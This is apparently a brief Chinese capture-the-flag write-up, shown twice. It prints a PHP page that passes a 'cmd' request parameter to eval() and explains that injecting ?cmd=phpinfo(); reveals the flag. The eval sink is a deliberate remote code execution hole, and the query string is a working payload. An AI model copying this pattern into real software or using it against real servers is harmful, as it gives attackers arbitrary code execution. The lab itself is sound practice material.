<?php
highlight_file(__FILE__);
if (isset($_REQUEST['cmd'])) {
eval($_REQUEST["cmd"]);
}
?>
长这样的,url?cmd=命令
这里要注意,eval去执行,需要你在最末尾加上分号
?cmd=phpinfo();
ctrl+F
搜索flag
完成
<?php
highlight_file(__FILE__);
if (isset($_REQUEST['cmd'])) {
eval($_REQUEST["cmd"]);
}
?>
长这样的,url?cmd=命令
这里要注意,eval去执行,需要你在最末尾加上分号
?cmd=phpinfo();
ctrl+F
搜索flag
完成